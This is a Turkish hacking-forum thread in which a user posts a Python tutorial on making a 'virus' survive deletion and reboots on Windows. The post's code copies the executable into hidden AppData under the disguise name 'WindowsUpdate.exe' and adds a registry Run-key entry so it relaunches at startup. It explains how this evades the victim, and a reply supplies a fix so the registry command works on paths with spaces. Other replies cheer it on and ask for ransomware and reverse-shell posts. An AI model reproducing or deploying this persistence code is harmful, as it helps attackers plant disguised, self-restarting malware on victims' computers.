Python ile virüs silinse veya bilgisayar kapansa bile çalıştırmak!

Mamilate · 1 Nis 2024

Herkese merhaba bugün daha önceden yazdığımız bir virüsü silinse veya bilgisayar kapatılsa bile tekrardan nasıl çalıştırılır hale getiririz onu anlatacağım. Bu olaya ingilizce de "persistence" yani bilgisayar dilinde kalıcılık denir. Bizim burda yapmak istediğimiz şey hedef, bizim virüsümüzü çalıştırdığında o virüsü başka bir directory e kopyalayıp bilgisayar her açıldığında virüsü tekrardan çalıştırmak.

Önceki konularıma şuradan ulaşabilirsiniz : Python ile Hedefi Deli Etmek
Python ile RansomWare
<EĞİTİM AMAÇLIDIR, HİÇBİR SORUMLULUĞU KABUL ETMİYORUM>
Konun tamamını okumanızı öneririm herhangi bir şeyi kaçırdığınızda çalışmayabilir.

Virüs Kodu:

Python:

def display_warning():
    warning_message = """
******************************************************
*                                                    *
*            WARNING: YOUR SYSTEM HACKED!            *
*                                                    *
******************************************************
    """
    for _ in range(10):
        print(warning_message)
        time.sleep(1)
display_warning()

diyelim böyle bir virüs yaptık ve çalıştırıldığına böyle bir mesaj oynatıyor. şimdi amacımız bu virüsü silinse ve pc kapatılsa bile kalıcı hale getirmek.
Kalıcılık kodu:

Python:

import time
import subprocess
import os
import shutil
import sys


def baslangic():
    yeni_virus= os.environ["appdata"] + "\\WindowsUpdate.exe"
    if not os.path.exists(yeni_virus):
        shutil.copyfile(sys.executable,yeni_virus)
        reg_cmd = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus
        subprocess.call(reg_cmd, shell=True)

baslangic()

def display_warning():
    warning_message = """
******************************************************
*                                                    *
*            WARNING: YOUR SYSTEM HACKED!            *
*                                                    *
******************************************************
    """
    for _ in range(10):
        print(warning_message)
        time.sleep(1)
display_warning()

Evet arkadaşlar kodlarımız bu kadardı, şimdi açıklamaya geçelim.

Burada görmüş olduğunuz programlar bilgisayar her açıldığında çalıştırılan programlar. Bizim amacımız buraya kendi virüsümüzü eklemek. Bu ekranı "kayıt defteri düzenleyicisi" ile açtım, siz de isterseniz arama çubuğuna yazıp yukarıdaki directorylere gidip bilgisayarınız açıldığında hangi programların açılacağını kontrol edebilirsiniz.

Python:

import time
import subprocess
import os
import shutil
import sys

Dış işlemler için "subprocess", işletim sistemi ile ilişki için "os", dosya işlemleri için "shutil", bilgi çekmek için "sys" kütüphanelerini import ettik.

Python:

def baslangic():
    yeni_virus = os.environ["appdata"] + "\\WindowsUpdate.exe"

Başlangıç fonksiyonu tanımladık sonra da yeni_virus diye bir değişkene \AppData\Roaming\WindowsUpdate.exe değerini verdik. Yani burada AppDatanın içine virüsümüzün kopyasını gömmek için bir nevi bir directory hazırlamış olduk. "WindowsUpdate.exe" artık yeni oluşacak olan virüsümüzün ismi, istediğiniz şekilde değiştirebilirsiniz. Kısa bir not: AppData directory si gizlidir, yani gizli klasörleri göster seçeneğini açmadan (kimsede açık olmuyor neredeyse) AppData klasörünü göremez, böylelikle virüsümüzü silemez.

Python:

if not os.path.exists(yeni_virus):
    shutil.copyfile(sys.executable,yeni_virus)
    reg_cmd = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus
    subprocess.call(reg_cmd, shell=True)

Şimdi kodumuzun son kısmına geldik, burada işlemleri tekrar tekrar yapmamak için, yani her açıldığında kopyalama işleminin olmaması için ilk başta "os" yardımı ile yeni_virus directorysini kontrol ediyoruz, eğer yoksa "if not" bunları yap diyoruz. Bunları yap derken "shutil" yardımı ile içinde bulunduğumuz exe file ini yeni_viruse kopyala diyoruz Burada artık virüsümüz, yeni_virus e kopyalandı ve \AppData\Roaming\WindowsUpdate.exe diye appdatanın içine kopyalanan virüsü gizlemiş olduk, böylelikle virüsümüz silinse bile AppDatanın içine bakmadığı sürece kopyalanan virüsü silemez. Sonra bu yeni virusu, regedit ile her başladığında çalıştırmak için "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus" komutunu subprocess yardımı ile çalıştırdık. Ve artık virüsümüz silinse de pc kapatılıp açılsa da aktif olan bir virüsümüz oldu.

ÖZET
Elimizde bir virüs var ve bu virüsü kalıcı hale getirmek istiyoruz. İlk kodları yazdıktan sonra bu kodları çalışır hale getirmek için exe dosyasına çevirmemiz lazım bunun için ben pyinstaller tercih ediyorum. Exe ye çevirme işleminden sonra virüsümüz çalıştığında kendisini "Gizli Klasörler" in içinde olan AppDataya "WindowsUpdate.exe" diye bir dosyaya kopyalayacak(bu ismi değiştirebilirsiniz) ve böylelikle ana virüsümüz silinse bile kopyasını silmediği sürece virüsümüz orada duracak. Sonra bu kopyalan virüsü bilgisayar her başladığında çalıştırmak için regedit kullanarak Kayıt Defterine kopya virüsümüzü ekliyoruz, böylelikle bilgisayar her başladığında virüsümüz çalıştırılacak.

gördüğünüz gibi virüsümüz çalıştırıldığı anda kendini hemen belirtilen yerlere "WindowsUpdate.exe" olarak kopyaladı.
Evet arkadaşlar konum bu kadardı okuduğunuz için teşekkürler. Yazarak anca bu kadar anlatılabiliyor anlamadığınız bir yer olursa dm atabilirsiniz. Daha başka ne tür python kodları yazabilirim belirtirseniz sevirinim.

Bunjo · 1 Nis 2024

Mamilate' Alıntı:
Herkese merhaba bugün daha önceden yazdığımız bir virüsü silinse veya bilgisayar kapatılsa bile tekrardan nasıl çalıştırılır hale getiririz onu anlatacağım. Bu olaya ingilizce de "persistence" yani bilgisayar dilinde kalıcılık denir. Bizim burda yapmak istediğimiz şey hedef, bizim virüsümüzü çalıştırdığında o virüsü başka bir directory e kopyalayıp bilgisayar her açıldığında virüsü tekrardan çalıştırmak.
Önceki konularıma şuradan ulaşabilirsiniz : Python ile Hedefi Deli Etmek
Python ile RansomWare
<EĞİTİM AMAÇLIDIR, HİÇBİR SORUMLULUĞU KABUL ETMİYORUM>
Konun tamamını okumanızı öneririm herhangi bir şeyi kaçırdığınızda çalışmayabilir.

Virüs Kodu:

Python:

def display_warning(): warning_message = """ ****************************************************** * * * WARNING: YOUR SYSTEM HACKED! * * * ****************************************************** """ for _ in range(10): print(warning_message) time.sleep(1) display_warning()

diyelim böyle bir virüs yaptık ve çalıştırıldığına böyle bir mesaj oynatıyor. şimdi amacımız bu virüsü silinse ve pc kapatılsa bile kalıcı hale getirmek.
Kalıcılık kodu:

Python:

import time import subprocess import os import shutil import sys def baslangic(): yeni_virus= os.environ["appdata"] + "\\WindowsUpdate.exe" if not os.path.exists(yeni_virus): shutil.copyfile(sys.executable,yeni_virus) reg_cmd = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus subprocess.call(reg_cmd, shell=True) baslangic() def display_warning(): warning_message = """ ****************************************************** * * * WARNING: YOUR SYSTEM HACKED! * * * ****************************************************** """ for _ in range(10): print(warning_message) time.sleep(1) display_warning()

Evet arkadaşlar kodlarımız bu kadardı, şimdi açıklamaya geçelim.

Burada görmüş olduğunuz programlar bilgisayar her açıldığında çalıştırılan programlar. Bizim amacımız buraya kendi virüsümüzü eklemek. Bu ekranı "kayıt defteri düzenleyicisi" ile açtım, siz de isterseniz arama çubuğuna yazıp yukarıdaki directorylere gidip bilgisayarınız açıldığında hangi programların açılacağını kontrol edebilirsiniz.

Python:

import time import subprocess import os import shutil import sys

Dış işlemler için "subprocess", işletim sistemi ile ilişki için "os", dosya işlemleri için "shutil", bilgi çekmek için "sys" kütüphanelerini import ettik.

Python:

def baslangic(): yeni_virus = os.environ["appdata"] + "\\WindowsUpdate.exe"

Başlangıç fonksiyonu tanımladık sonra da yeni_virus diye bir değişkene \AppData\Roaming\WindowsUpdate.exe değerini verdik. Yani burada AppDatanın içine virüsümüzün kopyasını gömmek için bir nevi bir directory hazırlamış olduk. "WindowsUpdate.exe" artık yeni oluşacak olan virüsümüzün ismi, istediğiniz şekilde değiştirebilirsiniz. Kısa bir not: AppData directory si gizlidir, yani gizli klasörleri göster seçeneğini açmadan (kimsede açık olmuyor neredeyse) AppData klasörünü göremez, böylelikle virüsümüzü silemez.

Python:

if not os.path.exists(yeni_virus): shutil.copyfile(sys.executable,yeni_virus) reg_cmd = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus subprocess.call(reg_cmd, shell=True)

Şimdi kodumuzun son kısmına geldik, burada işlemleri tekrar tekrar yapmamak için, yani her açıldığında kopyalama işleminin olmaması için ilk başta "os" yardımı ile yeni_virus directorysini kontrol ediyoruz, eğer yoksa "if not" bunları yap diyoruz. Bunları yap derken "shutil" yardımı ile içinde bulunduğumuz exe file ini yeni_viruse kopyala diyoruz Burada artık virüsümüz, yeni_virus e kopyalandı ve \AppData\Roaming\WindowsUpdate.exe diye appdatanın içine kopyalanan virüsü gizlemiş olduk, böylelikle virüsümüz silinse bile AppDatanın içine bakmadığı sürece kopyalanan virüsü silemez. Sonra bu yeni virusu, regedit ile her başladığında çalıştırmak için "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus" komutunu subprocess yardımı ile çalıştırdık. Ve artık virüsümüz silinse de pc kapatılıp açılsa da aktif olan bir virüsümüz oldu.

ÖZET
Elimizde bir virüs var ve bu virüsü kalıcı hale getirmek istiyoruz. İlk kodları yazdıktan sonra bu kodları çalışır hale getirmek için exe dosyasına çevirmemiz lazım bunun için ben pyinstaller tercih ediyorum. Exe ye çevirme işleminden sonra virüsümüz çalıştığında kendisini "Gizli Klasörler" in içinde olan AppDataya "WindowsUpdate.exe" diye bir dosyaya kopyalayacak(bu ismi değiştirebilirsiniz) ve böylelikle ana virüsümüz silinse bile kopyasını silmediği sürece virüsümüz orada duracak. Sonra bu kopyalan virüsü bilgisayar her başladığında çalıştırmak için regedit kullanarak Kayıt Defterine kopya virüsümüzü ekliyoruz, böylelikle bilgisayar her başladığında virüsümüz çalıştırılacak.

gördüğünüz gibi virüsümüz çalıştırıldığı anda kendini hemen belirtilen yerlere "WindowsUpdate.exe" olarak kopyaladı.
Evet arkadaşlar konum bu kadardı okuduğunuz için teşekkürler. Yazarak anca bu kadar anlatılabiliyor anlamadığınız bir yer olursa dm atabilirsiniz. Daha başka ne tür python kodları yazabilirim belirtirseniz sevirinim.

Eline sağlık güzel olmuş, sanal makine (Hyper-V, VirtualBox vb.) platformlarda örnek bir Windows 10 makine kurup kodun test edilmiş halini de paylaşırsan daha güzel bir içerik olmuş olur, onun dışında hiç kimse kalıcılık sağlamak istediği sistemde ekrana koskoca "Your System Hacked" yazısını yazmaz fakat konu örnek olduğu ve paylaşılan kod üzerinde editleme yapılabileceği için bu bir sorun arz etmiyor.

Mamilate · 1 Nis 2024

Bunjo' Alıntı:
Eline sağlık güzel olmuş, sanal makine (Hyper-V, VirtualBox vb.) platformlarda örnek bir Windows 10 makine kurup kodun test edilmiş halini de paylaşırsan daha güzel bir içerik olmuş olur, onun dışında hiç kimse kalıcılık sağlamak istediği sistemde ekrana koskoca "Your System Hacked" yazısını yazmaz fakat konu örnek olduğu ve paylaşılan kod üzerinde editleme yapılabileceği için bu bir sorun arz etmiyor.

Teşekkürler hocam, diğer konularımda bunları ele alacağım.

Kudad · 2 Nis 2024

Ellerine sağlık paşam daha iyi bir ransomware ile beraber bekliyoruz bir de onion reverse shell konusu gelirse ufff zaten. malware konuları tutar

alexandre20 · 2 Nis 2024

subprocess.call satırında dosya yolunu tırnak (") içerisinde yazmadığın için, eğer kullanıcı adında boşluk varsa hata verecek bir kod olmuş. elinize sağlık

Mamilate · 2 Nis 2024

Kudad' Alıntı:
Ellerine sağlık paşam daha iyi bir ransomware ile beraber bekliyoruz bir de onion reverse shell konusu gelirse ufff zaten. malware konuları tutar

Eyvallah hocam, teşekkürler öneri için

alexandre20' Alıntı:
subprocess.call satırında dosya yolunu tırnak (") içerisinde yazmadığın için, eğer kullanıcı adında boşluk varsa hata verecek bir kod olmuş. elinize sağlık

Dediğinizi doğru anladıysam orada bir hata gözükmüyor, kullanıcı adını kullanmıyorum dosya yolunu belirtirken.

alexandre20 · 2 Nis 2024

Mamilate' Alıntı:
Dediğinizi doğru anladıysam orada bir hata gözükmüyor, kullanıcı adını kullanmıyorum dosya yolunu belirtirken.

os.environ["appdata"] --> C:\Users\Kullanıcı adı\Appdata yolunu verdiği için aslında kullanılıyor orda

Mamilate · 2 Nis 2024

alexandre20' Alıntı:
os.environ["appdata"] --> C:\Users\Kullanıcı adı\Appdata yolunu verdiği için aslında kullanılıyor orda

Tamam da bu bir hata değil ki her Windowsta sorunsuz çalışır. Çünkü biz kodda kullanıcı adını yazmıyoruz os.environ ile dosya yolunu alıyoruz.

Lihtg · 2 Nis 2024

Eline sağlık, gayet güzel bir konu

Mamilate · 2 Nis 2024

Lihtg' Alıntı:
Eline sağlık, gayet güzel bir konu

Teşekkür ederim

alexandre20 · 2 Nis 2024

Mamilate' Alıntı:
Tamam da bu bir hata değil ki her Windowsta sorunsuz çalışır. Çünkü biz kodda kullanıcı adını yazmıyoruz os.environ ile dosya yolunu alıyoruz.

Anlamıyorsun heralde dostum. Ordan aldığın değişkeni olduğu gibi REG ADD'ın sonuna eklersen içinde boşluk olduğu zaman hata alırsın.
Fix basit,

Python:

 reg_cmd = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"" + yeni_virus + "\""

Python ile virüs silinse veya bilgisayar kapansa bile çalıştırmak!

Mamilate

Üye

Bunjo

Uzman üye

Mamilate

Üye

Kudad

Katılımcı Üye

alexandre20

Katılımcı Üye

Mamilate

Üye

alexandre20

Katılımcı Üye

Mamilate

Üye

Lihtg

Moderatör

Mamilate

Üye

alexandre20

Katılımcı Üye

Sosyal medya sayfalarımız